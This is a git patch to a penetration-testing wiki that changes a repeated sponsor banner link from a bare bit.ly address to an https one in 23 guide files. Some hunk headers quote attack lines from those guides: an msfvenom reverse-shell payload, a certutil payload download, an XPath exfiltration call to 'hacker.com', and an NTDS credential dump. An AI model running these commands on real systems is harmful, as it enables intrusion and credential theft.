From efa155293704bcc577ecf568944ef134656a62f4 Mon Sep 17 00:00:00 2001 From: carlospolop Date: Mon, 27 Feb 2023 11:02:29 +0100 Subject: [PATCH] link --- README.md | 4 ++-- .../pentesting-wifi/README.md | 6 +++--- .../shells/msfvenom.md | 4 ++-- .../shells/windows.md | 6 +++--- .../linux-privilege-escalation-checklist.md | 4 ++-- .../README.md | 6 +++--- mobile-pentesting/android-app-pentesting/README.md | 12 ++++++------ .../android-applications-basics.md | 6 +++--- network-services-pentesting/135-pentesting-msrpc.md | 4 ++-- network-services-pentesting/27017-27018-mongodb.md | 4 ++-- .../5985-5986-pentesting-winrm.md | 6 +++--- network-services-pentesting/6000-pentesting-x11.md | 4 ++-- network-services-pentesting/6379-pentesting-redis.md | 6 +++--- .../8009-pentesting-apache-jserv-protocol-ajp.md | 4 ++-- .../pentesting-mssql-microsoft-sql-server/README.md | 6 +++--- network-services-pentesting/pentesting-ntp.md | 4 ++-- .../content-security-policy-csp-bypass/README.md | 6 +++--- pentesting-web/csrf-cross-site-request-forgery.md | 6 +++--- pentesting-web/file-inclusion/README.md | 6 +++--- pentesting-web/reset-password.md | 4 ++-- pentesting-web/xpath-injection.md | 6 +++--- .../active-directory-methodology/asreproast.md | 4 ++-- windows-hardening/stealing-credentials/README.md | 6 +++--- 23 files changed, 62 insertions(+), 62 deletions(-) diff --git a/README.md b/README.md index 8922818c9..c248af524 100644 --- a/README.md +++ b/README.md @@ -59,11 +59,11 @@ Get Access Today: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -### [HACKENPROOF](https://hackenproof.com/) +### [HACKENPROOF](https://bit.ly/3xrrDrL)
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials diff --git a/generic-methodologies-and-resources/pentesting-wifi/README.md b/generic-methodologies-and-resources/pentesting-wifi/README.md index 87e9643b1..bdc0438b8 100644 --- a/generic-methodologies-and-resources/pentesting-wifi/README.md +++ b/generic-methodologies-and-resources/pentesting-wifi/README.md @@ -14,7 +14,7 @@
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials @@ -304,7 +304,7 @@ So broken and disappeared that I am not going to talk about it. Just know that _
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials @@ -814,7 +814,7 @@ TODO: Take a look to [https://github.com/wifiphisher/wifiphisher](https://github
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials diff --git a/generic-methodologies-and-resources/shells/msfvenom.md b/generic-methodologies-and-resources/shells/msfvenom.md index 15776a116..316ee6ee7 100644 --- a/generic-methodologies-and-resources/shells/msfvenom.md +++ b/generic-methodologies-and-resources/shells/msfvenom.md @@ -19,7 +19,7 @@
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials @@ -197,7 +197,7 @@ msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials diff --git a/generic-methodologies-and-resources/shells/windows.md b/generic-methodologies-and-resources/shells/windows.md index 7385118d1..7aed21b3a 100644 --- a/generic-methodologies-and-resources/shells/windows.md +++ b/generic-methodologies-and-resources/shells/windows.md @@ -16,7 +16,7 @@
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials @@ -330,7 +330,7 @@ certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials @@ -586,7 +586,7 @@ WinPWN](https://github.com/SecureThisShit/WinPwn) PS console with some offensive
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials diff --git a/linux-hardening/linux-privilege-escalation-checklist.md b/linux-hardening/linux-privilege-escalation-checklist.md index 7635d0aee..27fc99859 100644 --- a/linux-hardening/linux-privilege-escalation-checklist.md +++ b/linux-hardening/linux-privilege-escalation-checklist.md @@ -14,7 +14,7 @@
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials @@ -166,7 +166,7 @@
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials diff --git a/macos-hardening/macos-security-and-privilege-escalation/README.md b/macos-hardening/macos-security-and-privilege-escalation/README.md index 2e910d04a..104b903ae 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/README.md +++ b/macos-hardening/macos-security-and-privilege-escalation/README.md @@ -14,7 +14,7 @@
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials @@ -459,7 +459,7 @@ launchctl print gui//com.company.launchagent.label
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials @@ -1270,7 +1270,7 @@ sudo killall -HUP mDNSResponder
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials diff --git a/mobile-pentesting/android-app-pentesting/README.md b/mobile-pentesting/android-app-pentesting/README.md index 82ffba061..973da9935 100644 --- a/mobile-pentesting/android-app-pentesting/README.md +++ b/mobile-pentesting/android-app-pentesting/README.md @@ -15,7 +15,7 @@
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials @@ -65,7 +65,7 @@ adb pull /data/app/com.android.insecurebankv2- Jnf8pNgwy3QA_U5f-n_4jQ==/base.apk
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials @@ -259,7 +259,7 @@ An application may contain secrets (API keys, passwords, hidden urls, subdomains
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials @@ -513,7 +513,7 @@ Probably you know about this kind of vulnerabilities from the Web. You have to b
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials @@ -726,7 +726,7 @@ Useful to detect malware: [https://koodous.com/](https://koodous.com)
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials @@ -811,7 +811,7 @@ For more information visit:
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials diff --git a/mobile-pentesting/android-app-pentesting/android-applications-basics.md b/mobile-pentesting/android-app-pentesting/android-applications-basics.md index 9bd50fde6..5f9d40d4e 100644 --- a/mobile-pentesting/android-app-pentesting/android-applications-basics.md +++ b/mobile-pentesting/android-app-pentesting/android-applications-basics.md @@ -15,7 +15,7 @@
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials @@ -136,7 +136,7 @@ If developers, write in Java and the code is compiled to DEX bytecode, to revers
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials @@ -468,7 +468,7 @@ Generally the MDM solutions perform functions like enforcing password policies,
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials diff --git a/network-services-pentesting/135-pentesting-msrpc.md b/network-services-pentesting/135-pentesting-msrpc.md index 09d7dea14..604c2ff7f 100644 --- a/network-services-pentesting/135-pentesting-msrpc.md +++ b/network-services-pentesting/135-pentesting-msrpc.md @@ -15,7 +15,7 @@
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials @@ -111,7 +111,7 @@ The **rpcdump.exe** from [rpctools](https://resources.oreilly.com/examples/97805
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials diff --git a/network-services-pentesting/27017-27018-mongodb.md b/network-services-pentesting/27017-27018-mongodb.md index 3e897a1df..cd4bcf79d 100644 --- a/network-services-pentesting/27017-27018-mongodb.md +++ b/network-services-pentesting/27017-27018-mongodb.md @@ -15,7 +15,7 @@
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials @@ -128,7 +128,7 @@ If you are root you can **modify** the **mongodb.conf** file so no credentials a
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials diff --git a/network-services-pentesting/5985-5986-pentesting-winrm.md b/network-services-pentesting/5985-5986-pentesting-winrm.md index ab48b9fa7..67d70a028 100644 --- a/network-services-pentesting/5985-5986-pentesting-winrm.md +++ b/network-services-pentesting/5985-5986-pentesting-winrm.md @@ -16,7 +16,7 @@
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials @@ -169,7 +169,7 @@ winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}'
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials @@ -338,7 +338,7 @@ Entry_2:
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials diff --git a/network-services-pentesting/6000-pentesting-x11.md b/network-services-pentesting/6000-pentesting-x11.md index 604fa10b5..39d893e15 100644 --- a/network-services-pentesting/6000-pentesting-x11.md +++ b/network-services-pentesting/6000-pentesting-x11.md @@ -19,7 +19,7 @@
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials @@ -167,7 +167,7 @@ Now as can be seen below we have complete system access:
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials diff --git a/network-services-pentesting/6379-pentesting-redis.md b/network-services-pentesting/6379-pentesting-redis.md index fa9c37c10..63e946fd1 100644 --- a/network-services-pentesting/6379-pentesting-redis.md +++ b/network-services-pentesting/6379-pentesting-redis.md @@ -15,7 +15,7 @@
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials @@ -154,7 +154,7 @@ HGET
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials @@ -337,7 +337,7 @@ _For some reason (as for the author of_ [_https://liveoverflow.com/gitlab-11-4-7
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials diff --git a/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md b/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md index de722421d..c424fe7f0 100644 --- a/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md +++ b/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md @@ -15,7 +15,7 @@
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials @@ -188,7 +188,7 @@ curl http://127.0.0.1:80
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials diff --git a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md index 996fd817f..285fc7e94 100644 --- a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md +++ b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md @@ -15,7 +15,7 @@
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials @@ -388,7 +388,7 @@ There are other methods to get command execution, such as adding [extended store
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials @@ -536,7 +536,7 @@ You probably will be able to **escalate to Administrator** following one of thes ​
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials diff --git a/network-services-pentesting/pentesting-ntp.md b/network-services-pentesting/pentesting-ntp.md index fe34fdfa5..36f5a34da 100644 --- a/network-services-pentesting/pentesting-ntp.md +++ b/network-services-pentesting/pentesting-ntp.md @@ -15,7 +15,7 @@
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials @@ -97,7 +97,7 @@ Entry_2: ​
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials diff --git a/pentesting-web/content-security-policy-csp-bypass/README.md b/pentesting-web/content-security-policy-csp-bypass/README.md index 7cb00a002..b93de458f 100644 --- a/pentesting-web/content-security-policy-csp-bypass/README.md +++ b/pentesting-web/content-security-policy-csp-bypass/README.md @@ -15,7 +15,7 @@
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials @@ -465,7 +465,7 @@ Trick from [**here**](https://ctftime.org/writeup/29310).
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials @@ -596,7 +596,7 @@ If you know how to exfiltrate info with WebRTC [**send a pull request please!**]
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials diff --git a/pentesting-web/csrf-cross-site-request-forgery.md b/pentesting-web/csrf-cross-site-request-forgery.md index 581090829..52dea0107 100644 --- a/pentesting-web/csrf-cross-site-request-forgery.md +++ b/pentesting-web/csrf-cross-site-request-forgery.md @@ -15,7 +15,7 @@
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials @@ -192,7 +192,7 @@ To set the domain name of the server in the URL that the Referrer is going to se
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials @@ -599,7 +599,7 @@ with open(PASS_LIST, "r") as f:
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials diff --git a/pentesting-web/file-inclusion/README.md b/pentesting-web/file-inclusion/README.md index 73c59219d..e86955795 100644 --- a/pentesting-web/file-inclusion/README.md +++ b/pentesting-web/file-inclusion/README.md @@ -15,7 +15,7 @@
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials @@ -431,7 +431,7 @@ Be sure to URL-encode payloads before you send them.
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials @@ -629,7 +629,7 @@ If you include any of the files `/usr/bin/phar`, `/usr/bin/phar7`, `/usr/bin/pha
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials diff --git a/pentesting-web/reset-password.md b/pentesting-web/reset-password.md index 04b33c399..f304430ca 100644 --- a/pentesting-web/reset-password.md +++ b/pentesting-web/reset-password.md @@ -14,7 +14,7 @@
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials @@ -328,7 +328,7 @@ The **reset tokens must have an expiration time**, after it the token shouldn't
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials diff --git a/pentesting-web/xpath-injection.md b/pentesting-web/xpath-injection.md index e07358b0d..8c0dcff0b 100644 --- a/pentesting-web/xpath-injection.md +++ b/pentesting-web/xpath-injection.md @@ -15,7 +15,7 @@
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials @@ -86,7 +86,7 @@ Info about how to make queries: [https://www.w3schools.com/xml/xpath\_syntax.asp
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials @@ -329,7 +329,7 @@ doc-available(concat("http://hacker.com/oob/", RESULTS))
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials diff --git a/windows-hardening/active-directory-methodology/asreproast.md b/windows-hardening/active-directory-methodology/asreproast.md index 3c8cb434d..1ff786f32 100644 --- a/windows-hardening/active-directory-methodology/asreproast.md +++ b/windows-hardening/active-directory-methodology/asreproast.md @@ -19,7 +19,7 @@
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials @@ -88,7 +88,7 @@ Set-DomainObject -Identity -XOR @{useraccountcontrol=4194304} -Verbos
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials diff --git a/windows-hardening/stealing-credentials/README.md b/windows-hardening/stealing-credentials/README.md index f778fd64c..b68010277 100644 --- a/windows-hardening/stealing-credentials/README.md +++ b/windows-hardening/stealing-credentials/README.md @@ -16,7 +16,7 @@
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials @@ -172,7 +172,7 @@ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials @@ -344,7 +344,7 @@ Download it from:[ http://www.tarasco.org/security/pwdump\_7](http://www.tarasco
-**[Follow HackenProof](bit.ly/3xrrDrL) to learn more about web3 bugs** +**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs** 🐞 Read web3 bug tutorials